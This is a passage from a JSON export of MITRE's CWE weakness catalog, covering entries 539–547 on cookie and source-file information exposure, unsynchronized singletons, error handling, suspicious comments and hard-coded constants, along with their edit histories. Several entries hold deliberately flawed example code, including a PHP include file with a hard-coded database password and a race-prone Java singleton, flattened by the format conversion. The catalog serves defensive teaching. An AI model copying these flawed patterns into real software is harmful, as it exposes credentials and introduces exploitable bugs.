Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"File and Directory Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"File and Directory Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"539":{"attr":{"@_ID":"539","@_Name":"Use of Persistent Cookies Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application uses persistent cookies, but the cookies contain sensitive information.","Extended_Description":"Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser\'s memory and are not stored anywhere, but persistent cookies are stored on the browser\'s hard drive. This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not store sensitive information in persistent cookies."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Persistent Cookies","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Persistent Cookies","attr":{"@_Date":"2020-02-24"}}]}},"540":{"attr":{"@_ID":"540","@_Name":"Inclusion of Sensitive Information in Source Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.","Extended_Description":"There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include removing this script from the web server and moving it to a location not accessible from the Internet."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Source Code","attr":{"@_Date":"2020-02-24"}}]}},"541":{"attr":{"@_ID":"541","@_Name":"Inclusion of Sensitive Information in an Include File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not store sensitive information in include files."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Protect include files from being exposed."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"<?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?>","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"<?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?>","xhtml:br":["","","",""]}}]}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Include Source Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Include Source Code","attr":{"@_Date":"2020-02-24"}}]}},"542":{"attr":{"@_ID":"542","@_Name":"DEPRECATED: Information Exposure Through Cleanup Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level. See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Cleanup Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Cleanup Log Files","attr":{"@_Date":"2018-03-27"}}]}},"543":{"attr":{"@_ID":"543","@_Name":"Use of Singleton Pattern Without Synchronization in a Multithreaded Context","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the singleton pattern when creating a resource within a multithreaded environment.","Extended_Description":"The use of a singleton pattern may not be thread-safe.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Other","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use the Thread-Specific Storage Pattern. See References."},{"Phase":"Implementation","Description":"Do not use member fields to store information in the Servlet. In multithreading environments, storing user data in Servlet member fields introduces a data access race condition."},{"Phase":"Implementation","Description":"Avoid using the double-checked locking pattern in language versions that cannot guarantee thread safety. This pattern may be used to avoid the overhead of a synchronized call, but in certain versions of Java (for example), this has been shown to be unsafe because it still introduces a race condition (CWE-209).","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This method is part of a singleton pattern, yet the following singleton() pattern is not thread-safe. It is possible that the method will create two objects instead of only one.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static NumberConverter singleton;public static NumberConverter get_singleton() {}","xhtml:br":"","xhtml:div":{"#text":"if (singleton == null) {}return singleton;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"singleton = new NumberConverter();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":["Consider the following course of events:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Thread A enters the method, finds singleton to be null, begins the NumberConverter constructor, and then is swapped out of execution."},{"xhtml:div":"Thread B enters the method and finds that singleton remains null. This will happen if A was swapped out during the middle of the constructor, because the object reference is not set to point at the new object on the heap until the object is fully initialized."},{"xhtml:div":"Thread B continues and constructs another NumberConverter object and returns it while exiting the method."},{"xhtml:div":"Thread A continues, finishes constructing its NumberConverter object, and returns its version."}]}},"At this point, the threads have created and returned two different objects."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC07-J","Entry_Name":"Prevent multiple instantiations of singleton objects"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-474"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of Singleton Pattern in a Non-thread-safe Manner","attr":{"@_Date":"2010-09-27"}}}},"544":{"attr":{"@_ID":"544","@_Name":"Missing Standardized Error Handling Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses.","Extended_Description":"If the application handles error messages individually, on a one-by-one basis, this is likely to result in inconsistent error handling. The causes of errors may be lost. Also, detailed information about the causes of an error may be unintentionally returned to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Quality Degradation","Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"define a strategy for handling errors of different severities, such as fatal errors versus basic log events. Use or create built-in language features, or an external package, that provides an easy-to-use API and define coding standards for the detection and handling of errors."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":[{"#text":"Missing Error Handling Mechanism","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Use a Standardized Error Handling Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"545":{"attr":{"@_ID":"545","@_Name":"DEPRECATED: Use of Dynamic Class Loading","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it partially overlaps CWE-470, it describes legitimate programmer behavior, and other portions will need to be integrated into other entries.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Dynamic Class Loading","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Dynamic Class Loading","attr":{"@_Date":"2017-05-03"}}]}},"546":{"attr":{"@_ID":"546","@_Name":"Suspicious Comment","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses.","Extended_Description":"Many suspicious comments, such as BUG, HACK, FIXME, LATER, LATER2, TODO, in the code indicate missing security functionality and checking. Others indicate code problems that programmers should fix, such as hard-coded variables, error handling, not using stored procedures, and performance issues.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation","Note":"Suspicious comments could be an indication that there are problems in the source code that may need to be fixed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Documentation","Description":"Remove comments that suggest the presence of bugs, incomplete functionality, or weaknesses, before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt demonstrates the use of a suspicious comment in an incomplete code block that may have security repercussions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (user == null) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// TODO: Handle null user condition."}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"547":{"attr":{"@_ID":"547","@_Name":"Use of Hard-coded, Security-relevant Constants","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.","Extended_Description":"If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation"],"Note":"The existence of hardcoded constants could cause unexpected behavior and the introduction of weaknesses during code maintenance or when making changes to the code if all occurrences are not modified. The use of hardcoded constants is an indication of poor quality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using hard-coded constants. Configuration files offer a more flexible solution."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The usage of symbolic names instead of hard-coded constants is preferred.","Body_Text":["The following is an example of using a hard-coded constant instead of a symbolic name.","If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurences, in this example it could lead to a buffer overflow.","In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buffer[1024];...fgets(buffer, 1024, stdin);","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"enum { MAX_BUFFER_SIZE = 1024 };...char buffer[MAX_BUFFER_SIZE];...fgets(buffer, MAX_BUFFER_SIZE, stdin);","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL06-C","Entry_Name":"Use meaningful symbolic constants to represent literal values in program logic"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, 